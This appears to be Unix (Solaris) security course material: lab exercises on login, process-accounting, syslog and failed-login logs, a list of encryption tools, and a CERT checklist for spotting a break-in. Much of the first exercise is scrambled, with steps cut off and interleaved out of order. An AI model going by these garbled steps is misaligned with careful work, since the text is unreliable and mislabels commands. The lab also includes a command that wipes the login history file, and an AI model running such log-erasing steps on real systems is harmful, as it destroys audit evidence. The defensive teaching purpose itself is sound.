during the class. 

 
3.  You can target individual users to verify their login habits or history. 
 

a.  Type:  # last‸labuser1  
 
b.  Do you see the login history for labuser1? _____________________________ 
 

4.  Since the wtmpx file is binary and does not clean itself up, you have to take special steps to keep 
its size in check.   
 
 a.  To archive the file, type:  # last‸>‸/lastlog1 
 
 b.  Type:  # cat‸lastlog1 
 

 

UNIX Auditing/Log

Practical Exercise SAS 10A 
EXERCISE A 
 
This PE will familiarize you with some of the more important Unix log files and how to read
manipulate them

 
 a.  Who was
 
2.  Another of the Unix logs tells us who is historically logging on the system.  This log is refe
to as the "lastlog" but normally is known as the wtmpx file (wtmp in older systems).  The wtm
file is a binary file that requires a special tool to read it.  The command to use is the "last" 
command.  Type:  # last 

a.  Did you see a long list of logins? ____________________________________ 
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at now, safely archived?  ___________ 

e.  Test your efforts.  Type:  # last 

__________ 
 

5.  P  that were ran and by whom 
they were ran.  It is not a DA requirement to do process accounting as it takes a toll on system 
reso te picture of the goings on with respect to 
commands.  Start up process accounting 

 
 

ccounting is now started.  To read it you need to use special commands.  The 
mands will do this for you. 

ou ran?  

 
6.  S
 

ess report info.  You may see mention of it failing or setting 
 Ignore these for classroom purposes. 

 

 c.  Do you see the wtmpx file in ascii form
 
 d.  To zero out the file, pass a null value to it.   
 

1.  Type:  # cat‸/dev/null‸>‸/etc/wtmpx 
 

 
f.  Is the log empty?  ______________________________

g.  Do you see a new log start date?  ____________________________ 
 

rocess accounting is when the system keeps track of all commands

urces.  It does, however, give you a comple

 
a.  Type:  # /usr/lib/acct/accton‸/var/adm/pacct 

b.  Process a 
"acctcom" and "lastcomm" com
 
 c.  Type:  # clear 
  
 d.  Type:  # ls 
 
 e.  Type:  # acctcom  
 

f.  Type:  # lastcomm  
 

g.  When you used acctcom and lastcomm, did you see the previous commands y
_______________________.  Did you see that both commands read the /var/adm/pacct  file 
but deliver a slightly different output?  ______________________ 

et up some of the reporting features within process accounting.  

a.  Type:  # /usr/lib/acct/runacct 
 

1.  This will set up proc
up of holidays. 

b.  Type:  # acctcom 
 
c.  Did you see the process accounting structured format?  __________________ 
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.  
in 

ies.   
 

facility known as "syslog" keeps track of errors and messages from 

 1.  Notice where different information is directed. 

‸/var/log/syslog 

 the 

ost current info.  

he last 10 entries in the /var/adm/messages file 

?  

 c.  Check the sulog configuration:  Type:  # cat‸/etc/default/su 

 
d.  Type:  # /usr/lib/acct/prdaily‸|‸more 
 

1.  This will print out a daily process report that can be viewed a page at a time
You will also notice that one page gives a record of the last time users logged 
which is good for auditing account activit

7.  The general purpose logging 
numerous sources.  Look at how it is configured.   
 

a.  Type:  # cat‸/etc/syslog.conf 
 

 
b.  Type:  # cat‸/var/adm/messages 
 
c.  Type:  # cat
 
d.  Did you see some of the various errors or messages that have been generated during
class?  ____________________________ 
 
f.  Normally we only what to view the m
 

1.  Type:  tail‸-10‸ /var/log/syslog 
 
2.  This views the last 10 entries in the /var/log/syslog file 
 

g.  Type:  # dmesg‸|‸tail‸-10 
 
 1.  This will read t
 

8.  It is important to track super-user activity.  The "sulog" tracks this information.   
 
 a.  Type:  # more‸/var/adm/sulog 
 
 b.  Do you see the various times you became a different user during previous PE's
 

 ______________________________________________________________ 
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ike 
ave 

 
b.  Close the editor and check to see if /etc/rc2.d/S72inetsvc is also changed.  S72inetsve is 

2.d/S72inetsvc 

________  A change to one is a change to 

default inetd file.  Type:#  dtpad‸ /etc/default/inetd 
 

ve the # symbol) the line for enable_connection_logging=NO 

‸ | ‸grep‸ 

 
kill‸ –HUP‸ (PID#) 

, type:  # telnet‸localhost‸21 
 also type:  USER labuser1 (hit enter) PASS student1 (hit enter) 

es) 
 
l.  Type:  # dmesg‸|‸tail‸-10 
 
 1.  Do the logs indicate some ftp or finger activity? ____________________ 
 

10. A big problem with logs are that they grow big and need to be kept in manageable sizes.  Take a 
look at the current log sizes. 
 
 a.  Type:  # du‸-s‸-k‸/var/log/*‸|‸sort‸-rn 
 
 b.  Type:  # du‸-s‸-k‸/var/adm/*‸|‸sort‸-rn 

 
9.  Set up logging of network services.  Type:  # dtpad‸/etc/init.d/inetsvc 
 

a.  Go to the bottom of the file where the line containing "inetd -s " is.  Edit it to look l
"inetd -s -t "  (do not put in quotation marks).  Solaris 8 may also have a & symbol.  S
the file. 

a link of inetsvc.  Type:  # cat‸/etc/rc
 
c.  Do both files look identical?  _____________
both.  /etc/rc2.d/S72inetsvc is a link of /etc/init.d/inetsvc. 
 
d.  Now edit the 

e.  Un-comment (remo
 
f.  Change the enable_connection_logging=NO to YES 
 
g.  Save the file and exit the dtpad program. 
 
h.  Next find the ID for the inetd process.  In the terminal window, type:  # ps‸ –ef

inetd 

i.  Kill and restart the process, type: #  
 
j.  Test the logging features

rs will Solaris 9 use
 1.  Type:  quit 
 
k.  Type:  # telnet‸localhost‸79 
 
 1.  Hit the enter key twice (2 tim
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 c.  Were you able to see some familiar log names and the size of the CfilesC?  __________ 
 
  1.  The log sizes are shown in kilobytes. 
 
 d.  Check the overall health of your file systems.   
 
  1.  Type:  # df‸-k‸|‸awk‸ '{‸print‸$6‸"\t"‸$4‸}C' C 
 

2.  Do you see the names of the directories and how many kilobytes of free space 
they Chave C?  ______________________________ 

11. From time to time you will need to store files in an encrypted state.  Encrypting sensitive data 
can be very useful.   
 
 a.  Type:  # dtpad‸testfile 
 
 b.  Enter the text:  I am a test file with very little ambition in life. 
 
  1.  Save the file and close the editor 
 
 c.  Type:  # cat‸testfile‸|‸crypt‸>‸testfile.cpt 
 
  1.  Enter:  password when prompted for a key 
 
 d.  Type:  # cat‸testfile.cpt 
 
 e.  Is the file CencryptedC? ____________________ 
 
 f.  Un-encrypt it.  Type:  # cat‸testfile.cpt‸|‸crypt‸>‸testfile.new 
 
  1.  Enter:  password when prompted for the key 
 
 g.  Type:  # cat‸testfile.new 
 
  1.  Is the file Cunencrypted C?  _________________ 
 
12.  End of PE
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Practical Exercise SAS 10B 
EXERCISE B 
 
PURPOSE:  To give students familiarity with setting up specialized Unix log files and observing 
the output. 
 
 
1. Login as root 
 
Create a log to collect failed login attempts.  The /var/adm/loginlog file will collect failed login 
attempts.  Bad login attempts will not be logged unless the /var/adm/loginlog file exists, is 
owned by root, the group is sys, and has read and write permissions only for root. 
 
2. Open a Terminal Window. 
 
3. At the command prompt #, type touchB  B/var/adm/loginlog 

 

Change the group to sys. 
4. At the command prompt #, type chgrp B B sys B B /var/adm/loginlog 
 
Change the permissions so that only root has read and write permissions. 
5. At the command prompt #, type chmod B B600B B /var/adm/loginlog 
 
Verify your changes. 
6. At the command prompt #, type  lsB B -lB B /var/adm/loginlog 
 
7. Right click the background, left click Hosts and select Terminal Console. 
 
8. Minimize the Console Window opened in step 7.  Do not close the window. 

 
9. In the Terminal Window, at the password prompt, type: 
 

rlogin B B localhost  B  B–l B  Blabuser1 
  
 When a password is requested, enter a password of duh 
 
10. At the login prompt type: labuser1 with a password of  duh 
 
11.  Repeat steps 10 four (4) more times.   
 
12. Open the Console window by double clicking on the Console icon. 
 
13. What message is displayed ? 
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_______________________________________________________________________________ 
 
_______________________________________________________________________________ 
 
14. Close the Console window. 
 
 
Check to see if the bad login attempts have been captured by the /var/adm/loginlog file.   
15. On the Terminal Window, at the command prompt #, type cat B B /var/adm/loginlog 

 
16.  You should see that the bad login attempts have been logged.  Have they?  ________________ 
 
17.  The log file will tell you the account that had the bad login attempts, the port used, and the date 
and time of the attempts.  Which port was used during the attempted logins? 
________________________________________________________________________________ 
 
________________________________________________________________________________ 
 
 
18. On the Terminal Window, at the command prompt #, type: grep B  BFAILURES B B 
/var/adm/messages B  B| B  Bmore 
 
19. What information is displayed? 
________________________________________________________________________________ 
 
________________________________________________________________________________ 
 
 
End exercise………. 
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Data Encryption System (DES)  (ACERT APPROVED) 
• If possible, ALWAYS super-encrypt with Triple-DES. 
• DO NOT use the 40-bit DES algorithm for encryption (it has been broken). 
 
DES is a kit that builds a DES encryption library. It supports numerous encryption modes 
including: Electronic Code Book (ecb), Cipher Block Chaining (cbc), Output Feedback 
(ofb), Cipher Feedback (cfb), Triple cbc, MIT's pcbc and has a fast implementation of crypt. 
It contains support routines to read keys from a terminal, generate a key from an arbitrary 
length string, read/write encrypted data from a file descriptor.  
 
It can be found at: Thttps://www.acert.belvoir.army.mil/ACERTmain.htmT  
 
• NEVER use a login password as an encryption key. 
• PROTECT your encryption key as you would your password 
• PROTECT your encryption programs against tampering. 
 
 
Triple DES Algorithm 

• Based on the DES algorithm.  The encryption is performed three times with three 
different keys.  The multiple encryptions result in a ciphertext that has an effective 
key size as large as the sum of the sizes of the three keys. 

• If all three 64bit keys have the same value, the algorithm is no stronger than DES. 
 
 
Advanced Encryption Standard (AES) 

• A new algorithm to use in place of DES.  It utilizes the Rijndael algorithm. 
• AES has a private key symmetric block cipher similar to DES 
• AES is stronger and faster than DES.  Encrypts at 70.2 Mbps versus DES at 28 

Mbps. 
• AES has a life expectancy of 20 to 30 years 
• AES supports key sizes of 128 bit, 192 bit, and 256 bit. 

 
Pretty Good Privacy (PGP)  
• USE PGP (where authorized, if practical) to encrypt files and sensitive email, and to 

create and check digital signatures on important files. 
• VERIFY the digital signature of any signed files.  Tools like PGP may be used to sign 

files and to verify those signatures. 
 
PGP implements encryption and authentication.  
 
It can be found at: Tftp://ftp.ox.ac.uk/pub/pgp/unix/T  
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    Message Digest 5 (MD5) (ACERT APPROVED) 
• USE a message digest program, such as MD5 or SHA-1.  MD5 is a message digest 

algorithm. If no digital signature is supplied but an md5 checksum is supplied, then 
verify the checksum information to confirm that you have retrieved a valid copy.  

• Creates a 128 bit  message digest 
 
It can be found at: Tftp://coast.cs.purdue.edu/pub/tools/unix/md5/T 
 
    SHA-1 
• USE a message digest program, such as MD5 or SHA-1.  SHA-1 is a message digest 

algorithm. If no digital signature is supplied but an SHA-1 checksum is supplied, then 
verify the checksum information to confirm that you have retrieved a valid copy.  

• Creates a 160 bit message digest. 
• Stronger but slower than MD5 
 
It can be found at: Tftp://coast.cs.purdue.edu/pub/tools/unix/md5/T 
 
 
 
 
SunScreen Secure Net           (ACERT APPROVED) 

Type of Firewall: Proxy and stateful-inspection 
Operating System: Solaris and Solaris X68 
Latest Version: 3.1  
Features:  

• Stealth and routing design, hardened OS  

• Dynamic and proxy filtering (SMTP, HTTP, FTP, Telnet)  

• Remote administration and central management  

• High availability and scalability  

• SPARC and INTEL hardware, ATM (CIP or LANE), FDDI, token ring, or Ethernet 
(10, 100, and Gigabit)  
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DISCOVERING A BREAK-IN  
(Note:  The following information was taken in its entirety from the Software Engineering 
Institute, Carnegie Mellon University) 
U.S. Government only 
Software Engineering Institute authored documents are sponsored by the U.S. Department of 
Defense under Contract F19628-95-C-0003. Carnegie Mellon University retains copyrights 
in all material produced under this contract. The U.S. Government retains a non-exclusive, 
royalty-free license to publish or reproduce these documents, or allow others to do so, for 
U.S. Government purposes only pursuant to the copyright license under the contract clause 
at 52.227-7013. 
 
References: 
Tftp://info.cert.org/pub/tech_tips/intruder_detection_checklistT 
Tftp://info.cert.org/pub/tech_tips/UNIX_configuration_guidelines 
ftp://info.cert.org/pub/tech_tips/security_tools 
ftp://info.cert.org/pub/tech_tips/root_compromise 
http://www.porcupine.org/satan/admin-guide-to-cracking.html 
 
Log files 
�1.  EXAMINE log files for connections from unusual locations or other unusual activity. 
For example, look at your last log, process accounting, all logs created by syslog, and other 
security logs. 
If your firewall or router writes logs to a different location than the compromised system, 

remember to check these logs also. Note that this is not foolproof unless you log to 
append-only media; many intruders edit log files in an attempt to hide their activity. 
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SetUID & SetGID files 
�1.  LOOK for setuid and setgid files (especially setuid root files) everywhere on your 
system. Intruders often leave setuid copies of  /bin/sh or /bin/time around to allow them root 
access at a later time. The UNIX find(1) program can be used to hunt for setuid and/or setgid 
files. For example, you can use the following commands to find setuid root files and setgid 
kmem files on the entire file system: 
 

# find / -user root -perm -4000 (-print as required) 
        #find / -group kmem -perm -2000 (-print as required) 

 
• Note that the above examples search the entire directory tree, 

including NFS/AFS mounted file systems. Some find(1) commands support an 
"-xdev" option to avoid searching those hierarchies. 

      For example: 
        #find / -user root -perm -4000 -print -xdev 

 
• Another way to search for setuid files is to use the ncheck(8) command 

on each disk partition. For example, use the following command to 
search for setuid files and special devices on the disk partition 
/dev/rsd0g: 

 
        #ncheck -s /dev/rsd0g 
System binaries 
�1.  CHECK your system binaries to make sure that they haven't been altered. We've seen 
intruders change programs on UNIX systems such as login, su, telnet, netstat, ifconfig, ls, 
find, du, df, libc, sync, any binaries referenced in /etc/inetd.conf, and other critical 
network and system programs and shared object libraries. Compare the versions on your 
systems with known good copies, such as those from your initial installation media. Be 
careful of trusting backups; your backups could also contain Trojan horses. 
 
Trojan horse programs may produce the same standard checksum and timestamp as the 

legitimate version. Because of this, the standard UNIX sum(1) command and the 
timestamps associated with the programs are not sufficient to determine whether the 
programs have been replaced. The use of cpm, MD5, Tripwire, and other cryptographic 
checksum tools is sufficient to detect these Trojan horse programs, provided the 
checksum tools themselves are kept secure and are not available for modification by the 
intruder. Additionally, you may want to consider using a tool (PGP, for example) to 
"sign" the output generated by MD5 or Tripwire, for future reference 

 
Monitoring programs 
�1.  CHECK your systems for unauthorized use of a network monitoring program, commonly called a 
sniffer or packet sniffer. Intruders may use a sniffer to capture user account and password information.  
• For related information, see CERT advisory CA-94:01 available in 

ftp://info.cert.org/pub/cert_advisories/CA-94:01.network.monitoring.attacks 
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Cron & at jobs 
�1.  EXAMINE all the files that are run by cron and at. We've seen intruders leave back 

doors in files run from cron or submitted to at. These techniques can let an intruder 
back on the system (even after you believe you had addressed the original compromise). 
Also, verify that all files/programs referenced (directly or indirectly) by the cron and at 
jobs, and that the job files are not world-writeable. 

 
Unauthorized services 
�1.  CHECK for unauthorized services. Inspect /etc/inetd.conf for unauthorized additions 
or changes. In particular, search for entries that execute a shell program (for example, 
/bin/sh or /bin/csh) and check all programs that are specified in /etc/inetd.conf to verify 
that they are correct and haven't been replaced by Trojan horse programs. 
 
• Also CHECK for legitimate services that you have commented out in your 

/etc/inetd.conf. Intruders may turn on a service that you previously thought you had 
turned off, or replace the inetd program with a Trojan horse program. 

 
Password file 
�1.  EXAMINE the /etc/passwd file on the system and check for modifications to that file. 

In particular, look for the unauthorized creation of new accounts, accounts with no 
passwords, or UID changes (especially UID 0) to existing accounts. 

 
Configuration files 
�1.  CHECK your system and network configuration files for unauthorized entries. In 

particular, look for '+' (plus sign) entries and inappropriate non-local host names in 
/etc/hosts.equiv, /etc/hosts.lpd, and in all .rhosts files (especially root, uucp, ftp, 
and other system accounts) on the system. These files should not be world-writeable.  
Furthermore, confirm that these files existed prior to any intrusion and were not created 
by the intruder. 

 
Hidden or unusual files 
�1.  LOOK everywhere on the system for unusual or hidden files (files that start with a 
period and are normally not shown by ls), as these can be used to hide tools and 
information (password cracking programs, password files from other systems, etc.). A 
common technique on UNIX systems is to put a hidden directory in a user's account 
with an unusual name, something like '...' or '.. ' (dot dot space) or '..^G' (dot dot 
control-G). Again, the find(1) program can be used to look for hidden files, for 
example: 
 

#find / -name ".. " -xdev (-print as required) 
 

#find / -name ".*"   -xdev | cat -v (-print as required) 
 

Also, files with names such as '.xx' and '.mail' have been used (that is, files that might appear 
to be normal). 
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Local machines 
�1.  EXAMINE all machines on the local network when searching for signs of intrusion. 
Most of the time, if one host has been compromised, others on the network have been, 
too. This is especially true for networks where NIS is running or where hosts trust each 
other through the use of .rhosts files and/or /etc/hosts.equiv files. Also, check hosts 
for which your users share .rhosts access. 
 
 
Create a Unix Response Toolkit 
�1.  When investigating an incident, it is vital to have trusted commands on hand.  
Create a CD or floppy disk with the following tools: 

• ls, dd, des, file, pkginfo, find, icat, lsof, md5sum, netcat, netstat, pcat, perl, ps, 
strace, strings, truss, df, vi, cat, more, gzip, last, w, rm, script, hash, modinfo, 
lsmod, ifconfig 

 
 
Protect the Evidence 
�1.  When an incident is suspected, preserve the evidence by making a duplicate of the 
evidence media.  Perform the investigative steps on the restored image.  Freezing the 
scene is key to preserving evidence.  Evidence has differing levels of volatility.  It can be 
in places such as the processor registers, kernel data structures in memory, swap space, 
network data structures and counters, user process memory and stacks, file system 
buffer cache, the file system itself, etc. 
 
 
Conducting a Unix investigation 
�1.  Review all pertinent logs 
�2.  Perform key word searches 
�3.  Review relevant files 
�4.  Identify unauthorized user accounts or groups 
�5.  Identify rogue processes 
�6.  Check for unauthorized access points 
�7.  Analyze trust relationships 
�8.  Maintain a chain of custody on any evidence collected. 
 
 
 


